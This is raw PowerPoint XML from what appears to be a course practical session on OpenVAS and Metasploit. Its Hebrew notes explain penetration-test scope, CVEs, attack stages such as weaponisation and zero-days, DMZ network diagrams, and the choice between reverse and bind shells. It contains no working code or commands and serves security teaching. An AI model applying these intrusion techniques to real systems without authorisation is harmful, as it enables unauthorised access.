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790" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId55"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="365" r:id="rId4"/>
    <p:sldId id="596" r:id="rId5"/>
    <p:sldId id="597" r:id="rId6"/>
    <p:sldId id="598" r:id="rId7"/>
    <p:sldId id="561" r:id="rId8"/>
    <p:sldId id="562" r:id="rId9"/>
    <p:sldId id="563" r:id="rId10"/>
    <p:sldId id="594" r:id="rId11"/>
    <p:sldId id="564" r:id="rId12"/>
    <p:sldId id="565" r:id="rId13"/>
    <p:sldId id="566" r:id="rId14"/>
    <p:sldId id="568" r:id="rId15"/>
    <p:sldId id="571" r:id="rId16"/>
    <p:sldId id="573" r:id="rId17"/>
    <p:sldId id="574" r:id="rId18"/>
    <p:sldId id="575" r:id="rId19"/>
    <p:sldId id="576" r:id="rId20"/>
    <p:sldId id="577" r:id="rId21"/>
    <p:sldId id="560" r:id="rId22"/>
    <p:sldId id="548" r:id="rId23"/>
    <p:sldId id="579" r:id="rId24"/>
    <p:sldId id="578" r:id="rId25"/>
    <p:sldId id="580" r:id="rId26"/>
    <p:sldId id="581" r:id="rId27"/>
    <p:sldId id="582" r:id="rId28"/>
    <p:sldId id="584" r:id="rId29"/>
    <p:sldId id="585" r:id="rId30"/>
    <p:sldId id="586" r:id="rId31"/>
    <p:sldId id="545" r:id="rId32"/>
    <p:sldId id="541" r:id="rId33"/>
    <p:sldId id="542" r:id="rId34"/>
    <p:sldId id="543" r:id="rId35"/>
    <p:sldId id="544" r:id="rId36"/>
    <p:sldId id="546" r:id="rId37"/>
    <p:sldId id="547" r:id="rId38"/>
    <p:sldId id="549" r:id="rId39"/>
    <p:sldId id="589" r:id="rId40"/>
    <p:sldId id="590" r:id="rId41"/>
    <p:sldId id="595" r:id="rId42"/>
    <p:sldId id="593" r:id="rId43"/>
    <p:sldId id="591" r:id="rId44"/>
    <p:sldId id="550" r:id="rId45"/>
    <p:sldId id="551" r:id="rId46"/>
    <p:sldId id="552" r:id="rId47"/>
    <p:sldId id="553" r:id="rId48"/>
    <p:sldId id="554" r:id="rId49"/>
    <p:sldId id="555" r:id="rId50"/>
    <p:sldId id="557" r:id="rId51"/>
    <p:sldId id="558" r:id="rId52"/>
    <p:sldId id="559" r:id="rId53"/>
    <p:sldId id="592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668CE84-9D4C-45AE-974F-61BD46C8A7F7}">
          <p14:sldIdLst>
            <p14:sldId id="365"/>
            <p14:sldId id="596"/>
            <p14:sldId id="597"/>
            <p14:sldId id="598"/>
            <p14:sldId id="561"/>
            <p14:sldId id="562"/>
            <p14:sldId id="563"/>
            <p14:sldId id="594"/>
            <p14:sldId id="564"/>
            <p14:sldId id="565"/>
            <p14:sldId id="566"/>
            <p14:sldId id="568"/>
            <p14:sldId id="571"/>
            <p14:sldId id="573"/>
            <p14:sldId id="574"/>
            <p14:sldId id="575"/>
            <p14:sldId id="576"/>
            <p14:sldId id="577"/>
            <p14:sldId id="560"/>
            <p14:sldId id="548"/>
            <p14:sldId id="579"/>
            <p14:sldId id="578"/>
            <p14:sldId id="580"/>
            <p14:sldId id="581"/>
            <p14:sldId id="582"/>
            <p14:sldId id="584"/>
            <p14:sldId id="585"/>
            <p14:sldId id="586"/>
            <p14:sldId id="545"/>
            <p14:sldId id="541"/>
            <p14:sldId id="542"/>
            <p14:sldId id="543"/>
            <p14:sldId id="544"/>
            <p14:sldId id="546"/>
            <p14:sldId id="547"/>
            <p14:sldId id="549"/>
            <p14:sldId id="589"/>
            <p14:sldId id="590"/>
            <p14:sldId id="595"/>
            <p14:sldId id="593"/>
            <p14:sldId id="591"/>
            <p14:sldId id="550"/>
            <p14:sldId id="551"/>
            <p14:sldId id="552"/>
            <p14:sldId id="553"/>
            <p14:sldId id="554"/>
            <p14:sldId id="555"/>
            <p14:sldId id="557"/>
            <p14:sldId id="558"/>
            <p14:sldId id="559"/>
            <p14:sldId id="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249" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="186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18948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microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo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4T20:18:43.031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6BE65-F92F-4BE5-A8E1-4AFC0B41BC81}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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6E04E-1471-464D-98BE-17EF296557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45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למשל: להעלות פוסט מתוך הבית הלבן שהנשיא מת.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6E04E-1471-464D-98BE-17EF296557D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6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במקרה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> כאן, נניח החברה מפחדת מ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Visitors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> שנכנסים אליה. אין להם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>יוזר</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, והחברה רוצה לראות אילו בעיות הם יכולים לעשות לה.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6E04E-1471-464D-98BE-17EF296557D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87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כאן זה עם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>יוזר</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> בתוך הארגון. כאן החברה רוצה לראות מה עובד מתוך הארגון יכול לעולל לה.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6E04E-1471-464D-98BE-17EF296557D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88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 smtClean="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> דרך רשמית לכתוב חולשות.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6E04E-1471-464D-98BE-17EF296557D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26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החדירה למחשב או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>לאיזור</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> הרצוי. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>2. חימוש</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> של התוקף. – זה בעצם אומר שאני מעביר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>מלוור</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> או נניח כלי שיתקוף רק את המחשב של אליס. זה כבר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p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6E04E-1471-464D-98BE-17EF296557D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55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החדירה למחשב או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>לאיזור</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> הרצוי. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>2. חימוש</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> של התוקף. – זה בעצם אומר שאני מעביר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>מלוור</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> או נניח כלי שיתקוף רק את המחשב של אליס. זה כבר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>כאן נכנס העניין של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Zero day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. נסחר בטירוף. </a:t>
            </a:r>
          </a:p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6E04E-1471-464D-98BE-17EF296557D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90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6E04E-1471-464D-98BE-17EF296557D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91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תשובה:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> כשאנחנו ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Black to red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> אם המחשב מאחורי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>או בסביבה נפרדת נצטרך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>reverse shell </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אם המחשב באותה הרשת ולא מוסתר אחד מהשני אפשר להשתמש ב </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bind shell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6E04E-1471-464D-98BE-17EF296557D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18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זה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" baseline="0" smtClean="0"/>
              <a:t>.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6E04E-1471-464D-98BE-17EF296557D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3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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr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Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12307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308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39AD20C-54B0-486F-9AE8-C6292E12760A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019</a:t>
            </a:fld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5D35B1-6FDD-4FBD-BBF4-C52B90CFCD8B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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83FAFD-1355-4F3C-A388-B098EC4DCF4E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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82C20C-8A65-4358-BBC9-F51064F91470}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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981200"/>
            <a:ext cx="8229600" cy="38862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39A390-222A-4E6C-9D66-268CBF824735}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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526E07-6473-4107-95CF-24AA8BCB1D6E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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9D0718-51EE-4245-9C6D-A1310934DB78}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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D9B6A3-7530-42E7-A45B-7F4CF2ED57DA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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9FD31E-E2DC-4715-8414-4E62F979D1A5}" type="slidenum">
              <a:rPr lang="he-IL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BE9E33-0FAA-4E3C-BBF3-5F5CFAC4FC1E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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8E9AB-59A9-4864-88CB-569242144ED8}" type="slidenum">
              <a:rPr lang="he-IL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E5A87-7A42-43FC-A0F5-0C6996F6D05B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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E7E4C9-E7D8-4424-AB7E-631150682DA2}" type="slidenum">
              <a:rPr lang="he-IL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FE29E1-0726-4F71-A939-C2C16BFE3539}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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989B49-04E7-42A6-BC40-AD587124DA09}" type="slidenum">
              <a:rPr lang="he-IL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949193-AFB6-4D43-90C0-E0E35420D047}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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CD66E-B4D8-4F4F-8928-16D6824CD5D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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080182-4646-4CAC-83C4-C1158A73A186}" type="slidenum">
              <a:rPr lang="he-IL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9BB1C7-D47C-412D-B600-0BD4A882CA13}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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58E2FA-17B2-490B-B0D4-0719FCF9268B}" type="slidenum">
              <a:rPr lang="he-IL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72E2B-6D04-45DC-B26A-0E3CEA4AD503}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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E0BD47-6BDF-483F-BD0C-29F5CC267F43}" type="slidenum">
              <a:rPr lang="he-IL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22C20E-17D2-4E4E-A64C-FF303BDD8477}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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C091F2-5305-422F-918B-2043A61EA502}" type="slidenum">
              <a:rPr lang="he-IL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BD8242-E2B9-482B-9CCC-9A3E6458615B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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EDB9A-F997-44DB-B19A-10255C6E4632}" type="slidenum">
              <a:rPr lang="he-IL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B53AD-45F5-4C5A-965D-37FCEAEE96D5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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E94307-07CA-4F96-B18B-5888F05CCF54}" type="slidenum">
              <a:rPr lang="he-IL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D1D836-E0FC-45A8-BA49-BB4BE8B9429A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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028892-9E74-445E-86BA-21A73A994197}" type="slidenum">
              <a:rPr lang="he-IL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5CFE6-5BD6-4D2B-AECC-00E1B692012C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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5043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01C8-9A55-4679-B021-33BE88BDF22D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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521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49061-7249-4D63-812F-5F788127445D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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794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CEC389-E18C-4602-915B-F024BDB61761}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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EE7D-F7F7-498D-B182-7A76B66C26D6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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582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885C-FBC2-4A26-81FC-F31C49622F05}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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791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AEE0-D1E8-4076-93EC-9A9275493DA5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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247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6FB82-4103-4CD4-A503-ABCD7F8A6DDA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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172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578D634-C1D7-47D7-BD0E-1078EC7D1116}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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729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44E73-F550-4F43-86B3-0A0AC5300135}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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713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516F1-E104-4C5F-AF59-DE2AAE251106}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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677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6289B-3845-4789-8EDF-CDDEB9AD0D4B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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1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BD0EC9-00AD-4B82-8971-D4A7771905BD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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F0624B-7102-4AAC-8A08-69A65156A3FA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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20F2FF-88A2-40BF-9652-DC6EC6BC3102}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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88F4BE-BD6A-4ED2-A474-EE11E0B1D80B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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BA7F3D-F011-42B2-A578-DF3AB333D013}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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A4396E-35C8-4B42-AA0D-728E85F3A83E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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1">
              <a:defRPr sz="1200">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:defRPr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1269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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11270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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11271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hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11272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hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11273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accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11274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hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11275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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11276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accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11277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accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/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280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fld id="{77D7130B-B41A-48D2-86AE-655B1B12C669}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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2pPr>
      <a:lvl3pPr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3pPr>
      <a:lvl4pPr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4pPr>
      <a:lvl5pPr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5pPr>
      <a:lvl6pPr marL="457200"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6pPr>
      <a:lvl7pPr marL="914400"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7pPr>
      <a:lvl8pPr marL="1371600"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8pPr>
      <a:lvl9pPr marL="1828800"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r" rtl="1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r" rtl="1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r" rtl="1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r" rtl="1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r" rtl="1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r" rtl="1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r" rtl="1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r" rtl="1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D4742A55-EFF8-4F8A-85D8-5EAC2DF71DE9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/15/2019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8FF16AF-60B7-4C8A-B0A0-97304EDDD802}" type="slidenum">
              <a:rPr lang="he-IL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7D7130B-B41A-48D2-86AE-655B1B12C669}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/15/2019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080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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/commen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6512" y="758952"/>
            <a:ext cx="9180512" cy="3566160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Computer &amp; Information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822961" y="4455621"/>
            <a:ext cx="75438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Practical session no. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit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51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7543800" cy="4023359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068960"/>
            <a:ext cx="3594013" cy="24936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132856"/>
            <a:ext cx="1634480" cy="16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4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7543800" cy="4023359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996952"/>
            <a:ext cx="1296144" cy="1296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70892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2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925921"/>
            <a:ext cx="7543800" cy="4023359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82" y="2414161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802" y="1903381"/>
            <a:ext cx="3390300" cy="238237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39752" y="4282239"/>
            <a:ext cx="2160240" cy="1648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DMZ</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2920327">
            <a:off x="1671950" y="3547888"/>
            <a:ext cx="805536" cy="489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Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7882868">
            <a:off x="4475121" y="3706041"/>
            <a:ext cx="805536" cy="489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708" y="2492896"/>
            <a:ext cx="494488" cy="4944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615" y="3039848"/>
            <a:ext cx="494488" cy="4944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433" y="3287092"/>
            <a:ext cx="494488" cy="4944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410" y="4792840"/>
            <a:ext cx="91440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376215" y="4445537"/>
            <a:ext cx="790790" cy="3708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Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Right Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19348191">
            <a:off x="4520257" y="4548790"/>
            <a:ext cx="1512725" cy="460767"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902405" y="3819339"/>
            <a:ext cx="790790" cy="3708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WAN</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519825" y="1774324"/>
            <a:ext cx="790790" cy="3708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LAN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2777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7543800" cy="40233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Demilitarized Zone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28" y="2337573"/>
            <a:ext cx="6660232" cy="384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9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7543800" cy="40233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Demilitarized Zone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420888"/>
            <a:ext cx="4648857" cy="366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8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7543800" cy="40233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Demilitarized Zone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132856"/>
            <a:ext cx="5230721" cy="392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1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to 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925921"/>
            <a:ext cx="7543800" cy="4023359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82" y="2414161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802" y="1903381"/>
            <a:ext cx="3390300" cy="238237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39752" y="4282239"/>
            <a:ext cx="2160240" cy="1648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DMZ</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2920327">
            <a:off x="1671950" y="3547888"/>
            <a:ext cx="805536" cy="489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Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7882868">
            <a:off x="4475121" y="3706041"/>
            <a:ext cx="805536" cy="489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708" y="2492896"/>
            <a:ext cx="494488" cy="4944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615" y="3039848"/>
            <a:ext cx="494488" cy="4944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433" y="3287092"/>
            <a:ext cx="494488" cy="4944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410" y="4792840"/>
            <a:ext cx="91440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376215" y="4445537"/>
            <a:ext cx="790790" cy="3708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Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Right Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19348191">
            <a:off x="4520257" y="4548790"/>
            <a:ext cx="1512725" cy="460767"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902405" y="3819339"/>
            <a:ext cx="790790" cy="3708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WAN</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519825" y="1774324"/>
            <a:ext cx="790790" cy="3708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LAN</a:t>
            </a:r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519" y="2618496"/>
            <a:ext cx="465584" cy="4655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65022" y="3505432"/>
            <a:ext cx="20924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Target Alice</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1984593"/>
            <a:ext cx="790790" cy="3708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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="he-I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7" y="2435754"/>
            <a:ext cx="735451" cy="73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1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 to Red (no user)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925921"/>
            <a:ext cx="7543800" cy="4023359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391" y="1868117"/>
